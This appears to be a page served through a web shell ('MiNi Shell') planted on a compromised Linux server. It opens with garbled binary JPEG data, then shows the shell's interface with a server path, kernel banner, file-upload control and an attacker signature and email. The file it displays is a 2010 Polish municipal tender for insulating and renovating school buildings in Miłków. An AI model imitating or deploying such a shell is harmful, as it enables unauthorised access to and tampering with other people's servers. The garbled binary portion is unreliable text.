JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100303/57366-N-2010.html

<p class="kh_header"><b>Podgórzyn: Termomodernizacja budynków A i B Szkoły Podstawowej  ( Zespół Szkolno-Przedszkolny) w Miłkowie</b><br>
<b>Numer ogłoszenia: 57366 - 2010; data zamieszczenia: 03.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Podgórzyn , ul. Żołnierska 14, 58-562 Podgórzyn, woj. dolnośląskie, tel. 075 7621093, faks 075 7621358.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podgorzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków A i B Szkoły Podstawowej  ( Zespół Szkolno-Przedszkolny) w Miłkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	Zakres  podstawowych robót:
BUDYNEK A
1/- Wymiana starych rynien z blachy ocynkowanej  fi 12 cm nie nadających się do użytku na nowe rynny 
 fi 15cm  z blachy ocynkowanej - 102,0 m;
2/ - Wymiana rur spustowych  z blachy ocynkowanej  fi 12 cm nie nadających się do użytku na nowe rury  spustowe fi 15 cm  z blachy  ocynkowanej ( nowe rury spustowe na nowych  uchwytach wraz z wykonaniem dodatkowych kolanek w celu połączenia z istniejącą kanalizacja deszczową -37,00 m;
3/- Rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy ocynkowanej nie nadającej się do użytku oraz montaż nowych obróbek blacharskich z blachy ocynkowanej - obróbki o szer. w rozwinięciu ponad 25 cm - 25,28 m2;
4/- Przemurowanie kominów z cegieł , oraz wymiana kominków  wentylacyjnych  na dachach płaskich z blachy ocynkowanej-  2,13 m3;
5/- Wywiezie gruzu na odległość 5 km- 8,13 m3
6/- Rozbiórka elementów betonowych ( schody)- 3,0 m3
7/-Demontaż starych  drewnianych okien  i montaż nowych okien  z kształtowników PCV o współczynniku U= 1,7 W/m2 -  4,72 m2; 
8/- Demontaż starych i montaż nowych krat okiennych- 4,70 m2
9/- Demontaż starych drzwi  metalowych i montaż nowych aluminiowych z naświetlem - 3,70 m2 ;
10/ Demontaż straych drzwi drewnianych i montaż nowych aluminiowych jednoskrzydłowych- 1,50 m2
 11/-Montaż daszków z poliwęglanu przy wejściu - 6,0 m2;
12/-Zamurowanie otworu po drzwiach w ścianie grub. 40 cm- 0,75 m2
13/-Malowanie farba olejną drewnianych części połaci dachowych wystających poza lico budynku ( z częściową wymianą i naprawa odeskowania wraz z niezbędnym uzupełnieniem pokrycia z blachy)-54,0 m2
14/- Parapety zewnętrzne z blachy ocynkowanej malowanej proszkowo o szerokości do 0,37 m- 17,10 m2
15/ Parapety wewnętrzne z PCV szer. do 20 cm-  5,50m
16/- Docieplenie dachów betonowych obejmująca : rozbiórkę  pokrycia z papy na dachach betonowych 
( 5 warstw) z przygotowaniem podłoża ( czyszczenie ręczne przez szczotkowanie i skrobanie powierzchni poziomych betonowych)  oraz ułożenie warstwami papy termozgrzewalnej:  jedna warstwa pod izolację  z płyty, ułożenie płyty styropianowej laminowanej dachowej  grub. 10cm oraz 2 warstw papy termozgrzewalnej wraz z utylizacją odpadów- 172,85 m2;
17/ -Malowanie dachu  blaszanego  farbą antykorozyjną dwukrotnie  z  wykorzystaniem rusztowań do ścian- 356,40 m2;
18/ -Tynk akrylowy barwiony na  ościeżach o szer, do 30 cm na siatce podwójnej- 197,97 m;
19/ -Cokół- tynk kamyczkowy  elewacyjny o grubości 2,0- 3,0 mm- 50,0 m2
20/- Ocieplenie budynków- dodatkowa warstwa siatki na parterze- 327,0 m2
21/- montaż kratek wentylacyjnych z żaluzją o wym. 0,73mx0,30 m- 5-szt
22/- Docieplenie stropów  poddasza ( II piętro) wełną mineralną  grub. 20 cm układaną na sucho- 86,10 m2;
23/- Docieplenie ścian  w systemie dociepleń nie gorszym niż CT 600 z tynkiem akrylowym barwionym  ( uziarnienie -baranek 2 mm, siatka  zabezpieczająca o gramaturze mniejszej lub równej 160g /m2 w systemie) z zastosowaniem styropianu grubości 12 cm  po uprzednim  przygotowaniu podłoża (  w tym  zdjęcie   i ponowny montaż elementów oświetlenia i innych drobnych elementów oraz niezbędne roboty tynkarskie) wraz z niezbędnym rusztowaniem - 559,70 m2
24/- Demontaż starych przewodów uziemiających  i odgromowych z pręta o przekroju do 120 mm2 mocowanych na wspornikach na ścianie w ciągu  pionowym  wraz ze wspornikami na ścianie z cegieł oraz montaż nowych -pręt o średnicy do 10 mm -37,0 m
25/- Badanie i pomiary instalacji piorunochronnej- 2 szt
BYDYNEK B
26/- Wymiana starych rynien z blachy ocynkowanej  fi 12 cm nie nadających się do użytku na nowe rynny fi 15cm  z blachy ocynkowanej - 69,10 m;
27/ - Wymiana rur spustowych  z blachy ocynkowanej  fi 12 cm nie nadających się do użytku na nowe rury  spustowe fi 15 cm  z blachy  ocynkowanej ( nowe rury spustowe na nowych  uchwytach wraz z wykonaniem dodatkowych kolanek w celu połączenia z istniejącą kanalizacja deszczową -37,00 m;
28/- Przemurowanie kominów z cegieł  o objętości w jednym miejscu do 0,5 m3- 2,17 m3
29/- Wywiezie gruzu na odległość- 5 km- 4,17 m3
30/- Rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy ocynkowanej nie nadającej się do użytku oraz montaż nowych obróbek blacharskich  z blachy ocynkowanej -obróbki  o szer w rozwinięciu ponad 25 cm- 17,85 m2
31/-Demontaż starych  drewnianych   i montaż nowych okien  z kształtowników PCV o współczynniku U= 1,7 W/m2 - 10,34 m2; 
32/ Okna połaciowe o wym. 0,9x1,05 m wraz z wykonaniem i obróbka otworów- 4 szt
33/- Demontaż starych i montaż nowych krat okiennych- 10,34 m2
34/- Demontaż starych drzwi  metalowych dwuskrzydłowych i montaż nowych  aluminiowych z naświetlem i montaż nowych aluminiowych z naświetlem - 7,54 m2 ;
35/ Demontaż straych drzwi drewnianych i montaż nowych aluminiowych jednoskrzydłowych- 1,6 m2
36/-Montaż daszków z poliwęglanu przy wejściu - 6,0 m2;
37/-Malowanie farba olejną drewnianych części połaci dachowych wystających poza lico budynku ( z częściową wymianą i naprawa odeskowania wraz z niezbędnym uzupełnieniem pokrycia z blachy)-56,65 m2
38/- Parapety zewnętrzne z blachu ocynkowanej malowanej proszkowo o szerokości do 0,37 m- 30,42 m2
39/ Parapety wewnętrzne z pCV szer. do 20 cm-  7,50 m
40/ Wypusty oświetleniowe- 9 kpl
41/ Wypusty na gniazdo wtykowe- 12 kpl
42/ Malowanie dachu blaszanego  farba antykorozyjną dwukrotnie z wykorzystaniem rusztowań do ścian- 356,72 m2
43/- Docieplenie dachów betonowych obejmująca :rozbiórkę  pokrycia z papy na dachach betonowych ( 5 warstw) z przygotowaniem podłoża ( czyszczenie ręczne przez szczotkowanie i skrobanie powierzchni poziomych betonowych)  oraz ułożenie warstwami papy termozgrzewalnej:  jedna warstwa pod izolację  z płyty, ułożenie płyty styropianowej laminowanej dachowej  grub. 10cm oraz 2 warstw papy termozgrzewalnej wraz z utylizacją odpadów- 322,64  m2;
44/ Demontaż starych rur wywiewnych oraz montaż nowych rur wywiewnych z PCV lub ocynkowane o średn. 110 mm/220 i długościom 1,0m wraz z ich obróbką z blachy ocynkowanej- 15 szt
45/-Docieplenie skosów poddasza ( rozbiórka podsufitek z desek otynkowanych, wykonanie rusztu drewnianego, ułożenie paraizolacji, ułożenie wełny mineralnej na sucho grub. 20 cm, okładzina z dwóch warstw płyty gipsowo-kartonowej grub. 12,5 mm, wyprawa gipsowa i malowanie farba emulsyjną- 131,48 m2
46/- Docieplenie ścian  w systemie dociepleń nie gorszym niż CT 600 z tynkiem akrylowym barwionym  ( uziarnienie -baranek 2 mm, siatka  zabezpieczająca o gramaturze mniejszej lub równej 160g /m2 w systemie) z zastosowaniem styropianu grubości 12 cm  po uprzednim  przygotowaniu podłoża (  w tym  zdjęcie   i ponowny montaż elementów oświetlenia i innych drobnych elementów oraz niezbędne roboty tynkarskie) wraz z niezbędnym rusztowaniem   -785,10 m2;
47/-Tynk akrylowy barwiony na  ościeżach o szer, do 30 cm na siatce podwójnej- 259,70 m;
48/- Ocieplenie budynków- dodatkowa warstwa siatki na parterze- 387,0 m2
49/ -Cokół- tynk kamyczkowy  elewacyjny o grubości 2,0- 3,0 mm- 75,0 m2
50/- Docieplenie stropów  poddasza ( II piętro) wełną mineralną  grub. 20 cm układaną na sucho- 109,10 m2;
51/- Demontaż starych przewodów uziemiających  i odgromowych z pręta o przekroju do 120 mm2 mocowanych na wspornikach na ścianie w ciągu  pionowym  wraz ze wspornikami na ścianie z cegieł oraz montaż nowych -pręt o średnicy do 10 mm -37,0 m
52/- Badanie i pomiary instalacji piorunochronnej- 2 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.42.10.00-4, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie najmniej jednej roboty budowlanej o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. roboty o wartości powyżej 400.000,00 zł, zawierającej w swym zakresie docieplenie ścian zewnętrznych styropianem wraz z wykonaniem wyprawy elewacyjnej , wymianę stolarki okiennej i drzwiowej zewnętrznej oraz załączenie dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie osobą (osobami) uczestniczącymi w wykonywaniu zamówienia, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowalnej. Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://podgorzyn.signform.pl/podgorzyn/browse.php?catprz=527<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Podgórzyn
ulica Żołnierska 14
58-562 Podgórzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2010 godzina 09:30, miejsce: Urząd Gminy Podgórzyn
ulica Żołnierska 14
58-562 Podgórzyn
pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com